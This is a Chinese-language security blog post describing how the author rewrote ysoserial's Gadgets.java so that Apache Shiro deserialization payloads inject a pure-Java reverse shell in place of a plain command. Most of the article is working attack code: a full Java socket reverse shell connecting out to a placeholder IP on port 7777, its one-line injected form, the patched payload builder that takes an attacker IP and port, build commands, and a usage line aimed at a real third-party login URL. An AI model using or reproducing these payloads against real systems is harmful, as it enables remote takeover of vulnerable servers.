<!DOCTYPE html>
<html class="has-navbar-fixed-top">
<head>
    <meta charset="utf-8">
<title>JAVA4-改写ysoserial解决常规shell失效问题 - ShuYu</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/outdated-browser/1.1.5/outdatedbrowser.min.css">




<meta name="description" content="他浑身都是弱点，简直一无是处，但他靠着自己的力量一步步克服，最终成为了火影">





    <meta name="description" content="最近项目中碰到了两个shiro反序列化，能出网反弹shell失败的情况，和公司师傅请教了一下，豁然开朗，修改了一下ysoserial的一些源码，也成功打通了改动的仓库https:&#x2F;&#x2F;github.com&#x2F;Kit4y&#x2F;shuyu-ysoserial打包版本https:&#x2F;&#x2F;github.com&#x2F;Kit4y&#x2F;Awesome_shiro&#x2F;tree&#x2F;master&#x2F;shiro_shuyu 为什么之前打不通？两">
<meta property="og:type" content="article">
<meta property="og:title" content="JAVA4-改写ysoserial解决常规shell失效问题">
<meta property="og:url" content="http://example.com/2020/06/17/JAVA4-%E6%94%B9%E5%86%99ysoserial%E8%A7%A3%E5%86%B3%E5%B8%B8%E8%A7%84shell%E5%A4%B1%E6%95%88%E9%97%AE%E9%A2%98/index.html">
<meta property="og:site_name" content="ShuYu">
<meta property="og:description" content="最近项目中碰到了两个shiro反序列化，能出网反弹shell失败的情况，和公司师傅请教了一下，豁然开朗，修改了一下ysoserial的一些源码，也成功打通了改动的仓库https:&#x2F;&#x2F;github.com&#x2F;Kit4y&#x2F;shuyu-ysoserial打包版本https:&#x2F;&#x2F;github.com&#x2F;Kit4y&#x2F;Awesome_shiro&#x2F;tree&#x2F;master&#x2F;shiro_shuyu 为什么之前打不通？两">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2020/06/17/JAVA4-%E6%94%B9%E5%86%99ysoserial%E8%A7%A3%E5%86%B3%E5%B8%B8%E8%A7%84shell%E5%A4%B1%E6%95%88%E9%97%AE%E9%A2%98/1.png">
<meta property="og:image" content="http://example.com/2020/06/17/JAVA4-%E6%94%B9%E5%86%99ysoserial%E8%A7%A3%E5%86%B3%E5%B8%B8%E8%A7%84shell%E5%A4%B1%E6%95%88%E9%97%AE%E9%A2%98/4.png">
<meta property="og:image" content="http://example.com/2020/06/17/JAVA4-%E6%94%B9%E5%86%99ysoserial%E8%A7%A3%E5%86%B3%E5%B8%B8%E8%A7%84shell%E5%A4%B1%E6%95%88%E9%97%AE%E9%A2%98/2.png">
<meta property="og:image" content="http://example.com/2020/06/17/JAVA4-%E6%94%B9%E5%86%99ysoserial%E8%A7%A3%E5%86%B3%E5%B8%B8%E8%A7%84shell%E5%A4%B1%E6%95%88%E9%97%AE%E9%A2%98/5.png">
<meta property="og:image" content="http://example.com/2020/06/17/JAVA4-%E6%94%B9%E5%86%99ysoserial%E8%A7%A3%E5%86%B3%E5%B8%B8%E8%A7%84shell%E5%A4%B1%E6%95%88%E9%97%AE%E9%A2%98/6.png">
<meta property="og:image" content="http://example.com/2020/06/17/JAVA4-%E6%94%B9%E5%86%99ysoserial%E8%A7%A3%E5%86%B3%E5%B8%B8%E8%A7%84shell%E5%A4%B1%E6%95%88%E9%97%AE%E9%A2%98/7.png">
<meta property="article:published_time" content="2020-06-17T07:16:11.000Z">
<meta property="article:modified_time" content="2020-11-24T04:50:23.332Z">
<meta property="article:author" content="ShuYu">
<meta property="article:tag" content="Java">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2020/06/17/JAVA4-%E6%94%B9%E5%86%99ysoserial%E8%A7%A3%E5%86%B3%E5%B8%B8%E8%A7%84shell%E5%A4%B1%E6%95%88%E9%97%AE%E9%A2%98/1.png">





<link rel="icon" href="/images/logo.png">


<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Ovo|Source+Code+Pro">
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/bulma/0.6.2/css/bulma.min.css">


<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/lightgallery/1.6.8/css/lightgallery.min.css">
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/justifiedGallery/3.6.5/css/justifiedGallery.min.css">


<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/styles/atom-one-light.min.css">


<link rel="stylesheet" href="/css/style.css">


<script defer src="//use.fontawesome.com/releases/v5.0.8/js/all.js"></script>


    
    
    
    
    
    
    
    
    
    

    


<meta name="generator" content="Hexo 5.2.0"></head>
<body>
    
<nav class="navbar is-transparent is-fixed-top navbar-main" role="navigation" aria-label="main navigation">
    <div class="container">
        <div class="navbar-brand">
            <a class="navbar-item navbar-logo" href="/">
                
                <img src="/images/logo.png" alt="" height="28">
                
            </a>
            <div class="navbar-burger">
                <span></span>
                <span></span>
                <span></span>
            </div>
        </div>
        
        <div class="navbar-menu navbar-start">
            
            <a class="navbar-item "
               href="/archives">Archives</a>
            
            <a class="navbar-item "
               href="/friends">Friends</a>
            
            <a class="navbar-item "
               href="/about">About</a>
            
            <a class="navbar-item "
               href="/tags">Tags</a>
            
        </div>
        
        <div class="navbar-menu navbar-end">
            
            <a class="navbar-item search" title="Search" href="javascript:;">
                <i class="fas fa-search"></i>
            </a>
            
            
            
            <a class="navbar-item" title="GitHub" target="_blank" rel="noopener" href="https://github.com/bkfish">
                
                <i class="fab fa-github"></i>
                
            </a>
               
            
        </div>
    </div>
</nav>

    <section class="section">
    <div class="container">
    <article class="article content gallery" itemscope itemprop="blogPost">
    <h1 class="article-title is-size-3 is-size-4-mobile" itemprop="name">
        
            JAVA4-改写ysoserial解决常规shell失效问题
        
    </h1>
    <div class="article-meta columns is-variable is-1 is-multiline is-mobile is-size-7-mobile">
        <span class="column is-narrow">
            
                <time datetime="2020-06-17T07:16:11.000Z" itemprop="datePublished">Jun 17 2020</time>
                <span class="second-date-block"> (Jun 17 2020)</span>
            
        </span>
        
        <span class="column is-narrow article-category">
            <i class="far fa-folder"></i>
            <a class="article-category-link" href="/categories/java%E5%AE%89%E5%85%A8%E7%A0%94%E7%A9%B6/">java安全研究</a>
        </span>
        
        
        <span class="column is-narrow">
            
            
            9 minutes read (About 1391 words)
        </span>
        
    </div>
    <div class="article-entry is-size-6-mobile" itemprop="articleBody">
    
        <p>最近项目中碰到了两个shiro反序列化，能出网反弹shell失败的情况，和公司师傅请教了一下，豁然开朗，修改了一下ysoserial的一些源码，也成功打通了<br>改动的仓库<a target="_blank" rel="noopener" href="https://github.com/Kit4y/shuyu-ysoserial">https://github.com/Kit4y/shuyu-ysoserial</a><br>打包版本<a target="_blank" rel="noopener" href="https://github.com/Kit4y/Awesome_shiro/tree/master/shiro_shuyu">https://github.com/Kit4y/Awesome_shiro/tree/master/shiro_shuyu</a></p>
<h2 id="为什么之前打不通？"><a href="#为什么之前打不通？" class="headerlink" title="为什么之前打不通？"></a>为什么之前打不通？</h2><p>两次项目均是这种情况，可以出网，可以反弹shell,但是命令执行就是没有回显</p>
<a id="more"></a>


<p><img src="1.png"></p>
<p>在前文中，我们捋了一下yso项目的结构<a href="/2020/05/29/java-dai-ma-shen-ji-ru-men-3-ysoserial-diao-shi-he-gou-zao-urldns-de-pop-lian/">JAVA3-ysoserial调试和构造URLDNS的pop链</a>,再看一下yso的项目框架</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">│  GeneratePayload.java &#123;&#123;生成poc的入口函数&#125;&#125;</span><br><span class="line">│  Deserializer.java &#123;&#123;反序列化模块&#125;&#125;</span><br><span class="line">│  Serializer.java &#123;&#123;序列化模块&#125;&#125;</span><br><span class="line">│  Strings.java &#123;&#123;字符处理模块&#125;&#125;</span><br><span class="line">│</span><br><span class="line">├─exploit &#123;&#123;一些直接调用的exp&#125;&#125;</span><br><span class="line">│      JBoss.java</span><br><span class="line">│      JenkinsCLI.java</span><br><span class="line">│      JenkinsListener.java</span><br><span class="line">│      ......</span><br><span class="line">│ </span><br><span class="line">├─payloads &#123;&#123;生成gadget poc的代码&#125;&#125;</span><br><span class="line">│  │  CommonsBeanutils1.java</span><br><span class="line">│  │  URLDNS.java</span><br><span class="line">│  │  .....</span><br><span class="line">│  │</span><br><span class="line">│  ├─annotation &#123;&#123;一些不重要的配置&#125;&#125;</span><br><span class="line">│  │      Authors.java</span><br><span class="line">│  │</span><br><span class="line">│  └─util  &#123;&#123;一些重复使用的单元&#125;&#125;</span><br><span class="line">│          ClassFiles.java</span><br><span class="line">│          Gadgets.java</span><br><span class="line">│</span><br><span class="line">└─secmgr &#123;&#123;和安全有关的管理&#125;&#125;</span><br><span class="line">        DelegateSecurityManager.java</span><br><span class="line">        ExecCheckingSecurityManager.java</span><br></pre></td></tr></table></figure>
<p>通过点追踪，我们找命令执行的拼接片段在ysoserial\payloads\util\ Gadgets.java<br><img src="4.png"><br>命令是通过</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">String cmd=<span class="string">&quot;java.lang.Runtime.getRuntime().exec(\&quot;&quot;</span> +</span><br><span class="line">            command.replaceAll(<span class="string">&quot;\\\\&quot;</span>,<span class="string">&quot;\\\\\\\\&quot;</span>).replaceAll(<span class="string">&quot;\&quot;&quot;</span>, <span class="string">&quot;\\\&quot;&quot;</span>) + <span class="string">&quot;\&quot;);&quot;</span>;</span><br></pre></td></tr></table></figure>
<p>也就是<a target="_blank" rel="noopener" href="https://github.com/Kit4y/shuyu-ysoserial/blob/master/src/main/java/ysoserial/payloads/util/Gadgets.java">https://github.com/Kit4y/shuyu-ysoserial/blob/master/src/main/java/ysoserial/payloads/util/Gadgets.java</a>这里的120行左右<br>拼接，然后作者在代码上注释了一行有意思的话</p>
<blockquote>
<p>// TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections</p>
</blockquote>
<p>很明白了，我们可以改成自己的纯java的片段，简直为所欲为，所以我们也打算对他下手了。</p>
<h2 id="java原生Socket-shell"><a href="#java原生Socket-shell" class="headerlink" title="java原生Socket_shell"></a>java原生Socket_shell</h2><p>这个不多说网上都有,这里为了反序列化，将所有的函数写上完整的包路径，比如java.net.Socket,java.io.IOException</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">rce</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> java.io.IOException, InterruptedException </span>&#123;</span><br><span class="line">        String host=<span class="string">&quot;XXX.XXX.XXX.XXX&quot;</span>;</span><br><span class="line">        <span class="keyword">int</span> port=<span class="number">7777</span>;</span><br><span class="line">        String cmd=<span class="string">&quot;/bin/sh&quot;</span>;</span><br><span class="line">        Process p=<span class="keyword">new</span> ProcessBuilder(cmd).redirectErrorStream(<span class="keyword">true</span>).start();</span><br><span class="line">        java.net.Socket s=<span class="keyword">new</span> java.net.Socket(host,port);</span><br><span class="line">        java.io.InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();</span><br><span class="line">        java.io.OutputStream po=p.getOutputStream(),so=s.getOutputStream();</span><br><span class="line">        <span class="keyword">while</span>(!s.isClosed()) &#123;</span><br><span class="line">            <span class="keyword">while</span>(pi.available()&gt;<span class="number">0</span>) &#123;</span><br><span class="line">                so.write(pi.read());</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">while</span>(pe.available()&gt;<span class="number">0</span>) &#123;</span><br><span class="line">                so.write(pe.read());</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">while</span>(si.available()&gt;<span class="number">0</span>) &#123;</span><br><span class="line">                po.write(si.read());</span><br><span class="line">            &#125;</span><br><span class="line">            so.flush();</span><br><span class="line">            po.flush();</span><br><span class="line">            Thread.sleep(<span class="number">50</span>);</span><br><span class="line">            <span class="keyword">try</span> &#123;</span><br><span class="line">                p.exitValue();</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">catch</span> (Exception e)&#123;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;;</span><br><span class="line">        p.destroy();</span><br><span class="line">        s.close();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>可以编译运行一下测试<br><img src="2.png"></p>
<h2 id="植入代码问题-如果只看结果可以跳过这一段"><a href="#植入代码问题-如果只看结果可以跳过这一段" class="headerlink" title="植入代码问题(如果只看结果可以跳过这一段)"></a>植入代码问题(如果只看结果可以跳过这一段)</h2><p>因为这是java,理论上直接讲我们socket的shell换行符删除，应该就能直接运行<br>于是将cmd改成暂时写死的的反弹shell代码片</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cmd&#x3D;&quot; String host&#x3D;\&quot;XXX.XXX.XXX.XXX\&quot;;int port&#x3D;7777;String cmd&#x3D;\&quot;&#x2F;bin&#x2F;sh\&quot;;Process p&#x3D;new ProcessBuilder(cmd).redirectErrorStream(true).start();java.net.Socket s&#x3D;new java.net.Socket(host,port);java.io.InputStream pi&#x3D;p.getInputStream(),pe&#x3D;p.getErrorStream(),si&#x3D;s.getInputStream();java.io.OutputStream po&#x3D;p.getOutputStream(),so&#x3D;s.getOutputStream();while(!s.isClosed()) &#123;while(pi.available()&gt;0) &#123;so.write(pi.read());&#125;while(pe.available()&gt;0) &#123;so.write(pe.read());&#125;while(si.available()&gt;0) &#123;po.write(si.read());&#125;so.flush();po.flush();try &#123;p.exitValue();break;&#125;catch (Exception e)&#123;&#125;&#125;;p.destroy();s.close();&quot;</span><br></pre></td></tr></table></figure>
<p>果不其然直接报错<br><img src="5.png"><br>看了很久这个报错，问了一下师傅（Orz长亭师傅是真的顶<br>原因在ProcessBuilder的构造<br>报错说<code>[source error] cannot find constructor java.lang.ProcessBuilder(java.lang.String)</code>意味着字符串当参数就不能反序列化了，我们查看ProcessBuilder源码</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment">    * Constructs a process builder with the specified operating</span></span><br><span class="line"><span class="comment">    * system program and arguments.  This is a convenience</span></span><br><span class="line"><span class="comment">    * constructor that sets the process builder&#x27;s command to a string</span></span><br><span class="line"><span class="comment">    * list containing the same strings as the &#123;<span class="doctag">@code</span> command&#125;</span></span><br><span class="line"><span class="comment">    * array, in the same order.  It is not checked whether</span></span><br><span class="line"><span class="comment">    * &#123;<span class="doctag">@code</span> command&#125; corresponds to a valid operating system</span></span><br><span class="line"><span class="comment">    * command.</span></span><br><span class="line"><span class="comment">    *</span></span><br><span class="line"><span class="comment">    * <span class="doctag">@param</span> command a string array containing the program and its arguments</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="title">ProcessBuilder</span><span class="params">(String... command)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">this</span>.command = <span class="keyword">new</span> ArrayList&lt;&gt;(command.length);</span><br><span class="line">    <span class="keyword">for</span> (String arg : command)</span><br><span class="line">        <span class="keyword">this</span>.command.add(arg);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>原来这里应该改成字符串数组，于是我们可以把<code> String cmd=&quot;/bin/sh&quot;;</code>改成<code>String[] cmd=new String[]&#123;\&quot;/bin/sh\&quot;&#125;</code>(军先师傅tql,<br>还有一个是Thread.sleep(50);也报错了，我们先直接删除</p>
<p>然后重新mvn打包-生成ysoserial.jar打一下试试</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">jar ：mvn clean install -Dmaven.test.skip&#x3D;true</span><br><span class="line">war：mvn clean package -Dmaven.test.skip&#x3D;true</span><br></pre></td></tr></table></figure>
<p>ok-成功打通了！<br><img src="6.png"></p>
<h2 id="优化"><a href="#优化" class="headerlink" title="优化"></a>优化</h2><p>现在我们只要把ip和端口写活着即可,因为暂时不想改整体框架的内容，就直接将command改了一下-懒癌是这样的，随手一改</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"> String[] cmds = command.split(<span class="string">&quot; &quot;</span>);</span><br><span class="line">String ip=cmds[<span class="number">0</span>];</span><br><span class="line">String port=cmds[<span class="number">1</span>];</span><br><span class="line">String cmd=<span class="string">&quot;String host=\&quot;&quot;</span>+ip+<span class="string">&quot;\&quot;;int port=&quot;</span>+port+<span class="string">&quot;;String[] cmd=new String[]&#123;\&quot;/bin/sh\&quot;&#125;;Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();java.net.Socket s=new java.net.Socket(host,port);java.io.InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();java.io.OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) &#123;while(pi.available()&gt;0) &#123;so.write(pi.read());&#125;while(pe.available()&gt;0) &#123;so.write(pe.read());&#125;while(si.available()&gt;0) &#123;po.write(si.read());&#125;so.flush();po.flush();try &#123;p.exitValue();break;&#125;catch (Exception e)&#123;&#125;&#125;;p.destroy();s.close();&quot;</span>;    </span><br></pre></td></tr></table></figure>
<p><a target="_blank" rel="noopener" href="https://github.com/Kit4y/Awesome_shiro/tree/master/shiro_shuyu">https://github.com/Kit4y/Awesome_shiro/tree/master/shiro_shuyu</a><br>尝试运行一下<br><code>python3 shiro_rce.py http://www.baidu.com/login.do &quot;xxx.xxx.xx.xx 7777&quot;</code><br><img src="7.png"></p>
<h2 id="感触"><a href="#感触" class="headerlink" title="感触"></a>感触</h2><p>学习java项目，研究源码是最直接最深触的学习途径，比去什么垃圾教程上看好多了。不仅可以看到项目如何跑，还能膜一下大佬们怎么写优雅的代码。通过修改源码改成自己顺手的工具也是一个不错的学习过程。Orz长亭师傅tql</p>

    
    </div>
    
    <div class="columns is-variable is-1 is-multiline is-mobile">
    
        <span class="column is-narrow"><a class="tag is-light article-tag" href="/tags/Java/">#Java</a></span>
    
    </div>
    
    
    <div class="columns is-mobile is-multiline article-nav">
        <span class="column is-12-mobile is-half-desktop  article-nav-prev">
            
            <a href="/2020/10/04/%E5%BA%9F%E7%89%A9%E5%88%A9%E7%94%A8%E4%B9%8B%E5%88%A9%E7%94%A8%E4%B8%80%E5%8F%B0%E5%BA%9F%E5%BC%83%E7%AC%94%E8%AE%B0%E6%9C%AC%E5%BF%AB%E9%80%9F%E6%90%AD%E5%BB%BACTF%E5%AE%9E%E9%AA%8C%E5%AE%A4%E5%9F%BA%E7%A1%80%E5%BB%BA%E8%AE%BE/">废物利用之利用一台废弃笔记本快速搭建CTF实验室基础建设</a>
            
        </span>
        <span class="column is-12-mobile is-half-desktop  article-nav-next">
            
            <a href="/2020/05/29/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E5%85%A5%E9%97%A83-ysoserial%E8%B0%83%E8%AF%95%E5%92%8C%E6%9E%84%E9%80%A0URLDNS%E7%9A%84pop%E9%93%BE/">JAVA3-ysoserial调试和构造URLDNS的pop链</a>
            
        </span>
    </div>
    
</article>




    </div>
</section>
    <footer class="footer">
    <div class="container">
        <div class="columns content">
            <div class="column is-narrow has-text-centered">
                &copy; 2020 ShuYu&nbsp;
                Powered by <a href="http://hexo.io/" target="_blank">Hexo</a> & <a
                        target="_blank" rel="noopener" href="http://github.com/ppoffice/hexo-theme-minos">Minos</a>
            </div>
            <div class="column is-hidden-mobile"></div>

            
            <div class="column is-narrow">
                <div class="columns is-mobile is-multiline is-centered">
                
                    
                <a class="column is-narrow has-text-black" title="GitHub" target="_blank" rel="noopener" href="https://github.com/bkfish">
                    
                    GitHub
                    
                </a>
                
                </div>
            </div>
            
            
        </div>
    </div>
</footer>
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script>

<!-- test if the browser is outdated -->
<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" target="_blank" rel="noopener" href="http://outdatedbrowser.com/">Update my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
<script src="//cdnjs.cloudflare.com/ajax/libs/outdated-browser/1.1.5/outdatedbrowser.min.js"></script>
<script>
    $(document).ready(function () {
        // plugin function, place inside DOM ready function
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        })
    });
</script>

<script>
    window.FontAwesomeConfig = {
        searchPseudoElements: true
    }
    moment.locale("en-AU");
</script>


    
    
<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.4/MathJax.js?config=TeX-MML-AM_CHTML"></script>
<script>
    MathJax.Hub.Config({
        "HTML-CSS": {
            matchFontHeight: false
        },
        SVG: {
            matchFontHeight: false
        },
        CommonHTML: {
            matchFontHeight: false
        },
        tex2jax: {
            inlineMath: [
                ['$','$'],
                ['\\(','\\)']
            ]
        }
    });
</script>

    
    
    
    
<script src="//cdnjs.cloudflare.com/ajax/libs/lightgallery/1.6.8/js/lightgallery-all.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/justifiedGallery/3.6.5/js/jquery.justifiedGallery.min.js"></script>
<script>
    (function ($) {
        $(document).ready(function () {
            if (typeof($.fn.lightGallery) === 'function') {
                $('.article.gallery').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof($.fn.justifiedGallery) === 'function') {
                $('.justified-gallery').justifiedGallery();
            }
        });
    })(jQuery);
</script>

    
    
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.0/clipboard.min.js"></script>
    <style>
        .hljs {
            position: relative;
        }

        .hljs .clipboard-btn {
            float: right;
            color: #9a9a9a;
            background: none;
            border: none;
            cursor: pointer;
        }

        .hljs .clipboard-btn:hover {
          color: #8a8a8a;
        }

        .hljs > .clipboard-btn {
            display: none;
            position: absolute;
            right: 4px;
            top: 4px;
        }

        .hljs:hover > .clipboard-btn {
            display: inline;
        }

        .hljs > figcaption > .clipboard-btn {
            margin-right: 4px;
        }
    </style>
    <script>
      $(document).ready(function () {
        $('figure.hljs').each(function(i, figure) {
          var codeId = 'code-' + i;
          var code = figure.querySelector('.code');
          var copyButton = $('<button>Copy <i class="far fa-clipboard"></i></button>');
          code.id = codeId;
          copyButton.addClass('clipboard-btn');
          copyButton.attr('data-clipboard-target-id', codeId);

          var figcaption = figure.querySelector('figcaption');

          if (figcaption) {
            figcaption.append(copyButton[0]);
          } else {
            figure.prepend(copyButton[0]);
          }
        })

        var clipboard = new ClipboardJS('.clipboard-btn', {
          target: function(trigger) {
            return document.getElementById(trigger.getAttribute('data-clipboard-target-id'));
          }
        });
        clipboard.on('success', function(e) {
          e.clearSelection();
        })
      })
    </script>

    
    

    



<script src="/js/script.js"></script>


    
    <div class="searchbox ins-search">
    <div class="searchbox-mask"></div>
    <div class="searchbox-container ins-search-container">
        <div class="searchbox-input-wrapper">
            <input type="text" class="searchbox-input ins-search-input" placeholder="Type something..." />
            <span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="searchbox-result-wrapper ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: 'Posts',
                PAGES: 'Pages',
                CATEGORIES: 'Categories',
                TAGS: 'Tags',
                UNTITLED: '(Untitled)',
            },
            CONTENT_URL: '/content.json',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>

<script src="/js/insight.js"></script>

    
</body>
</html>